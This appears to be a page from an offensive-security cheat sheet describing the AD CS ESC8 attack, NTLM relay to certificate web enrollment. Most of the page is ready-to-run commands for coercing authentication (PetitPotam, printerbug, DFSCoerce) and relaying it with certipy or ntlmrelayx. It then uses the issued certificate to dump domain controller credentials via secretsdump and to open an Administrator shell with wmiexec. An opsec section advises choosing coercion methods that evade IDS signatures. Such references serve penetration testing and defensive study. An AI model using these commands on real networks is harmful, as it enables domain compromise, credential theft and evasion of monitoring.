🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ADCSESC8

ADCSESC8

ESC8: NTLM relay to AD CS HTTP enrollment endpoint β€” coerce a machine account's NTLM authentication, relay it to the CA's web enrollment interface, and obtain a certificate for that machine account.

Applies to: Network position to NTLM-relay β†’ AD CS web enrollment (HTTP) endpoint (/certsrv/); no enrollment rights required on attacker account

Linux Abuse

certipy-ad relay (simplest β€” handles everything)

# Terminal 1: Start relay listener
certipy-ad relay -ca <ca-host> -template '<template>'
# Default template: Machine (for computer accounts), use DomainController for DCs

# Terminal 2: Coerce NTLM auth from target machine
# Option A β€” PetitPotam (unauthenticated in older Windows)
python3 PetitPotam.py <attacker-ip> <target-host>

# Option B β€” printerbug / SpoolSample
python3 printerbug.py '<domain>/<username>:<password>@<target-host>' <attacker-ip>

# Option C β€” DFSCoerce
python3 DFSCoerce.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <target-host>

# Certipy relay outputs: <target-computer>.pfx

# Authenticate with obtained machine cert
certipy-ad auth -pfx <target-computer>.pfx -dc-ip <dc-ip>
# Returns: machine account NT hash + TGT

# If targeting DC: perform secretsdump with machine account hash
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-computer>$@<dc-ip>'

ntlmrelayx (alternative β€” more control)

# Terminal 1: Start ntlmrelayx targeting CA web enrollment
ntlmrelayx.py -t "http://<ca-host>/certsrv/certfnsh.asp" \
  --adcs --template '<template>' -smb2support

# Terminal 2: Coerce NTLM auth from target
python3 PetitPotam.py <attacker-ip> <target-host>
# ntlmrelayx outputs base64-encoded PFX

# Decode and save PFX
echo '<base64-pfx>' | base64 -d > <target-computer>.pfx

# Authenticate
certipy-ad auth -pfx <target-computer>.pfx -dc-ip <dc-ip>

# Or use Rubeus (pass to Windows)
# Rubeus.exe asktgt /user:<target-computer>$ /certificate:<pfx-base64> /ptt

Post-cert β€” DC machine account β†’ DCSync

# Got DC machine account hash β€” perform DCSync
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<dc-name>$@<dc-ip>'

# Or use S4U2Self RBCD / pass-the-hash for shells
getST.py -spn 'cifs/<dc-host>' -hashes ':<ntlm-hash>' '<domain>/<dc-name>$'
export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass '<domain>/Administrator@<dc-host>'

Windows Abuse

Certify.exe coercion + ntlmrelayx

# Terminal 1 (Linux attacker): Start relay
ntlmrelayx.py -t "http://<ca-host>/certsrv/certfnsh.asp" --adcs --template Machine

# Terminal 2 (Windows): Coerce auth from target
Certify.exe coerceauth /ca:<ca-host>\<ca> /target:<attacker-ip>
# Or: SpoolSample.exe <victim-host> <attacker-ip>

Requirements Checklist

  • [ ] AD CS web enrollment enabled (/certsrv/ responding on HTTP/HTTPS)
  • [ ] HTTPS NOT required for enrollment (HTTP accepted) β€” check if HTTPS is enforced; if so, relay needs HTTPS support
  • [ ] Target machine can be coerced (SpoolSvc running, or PetitPotam applicable)
  • [ ] Template allows machine/computer enrollment (e.g., Machine, DomainController)

Opsec

  • HTTP enrollment events logged on the CA (IIS logs + CA audit log).
  • Coercion attempts generate Event ID 4624 (logon) on the coerced machine.
  • PetitPotam may trigger IDS signatures β€” use less-signatured coercion methods (DFSCoerce, PrinterBug) where possible.
  • The issued cert appears in CA's Issued Certificates store attributed to the relayed machine identity.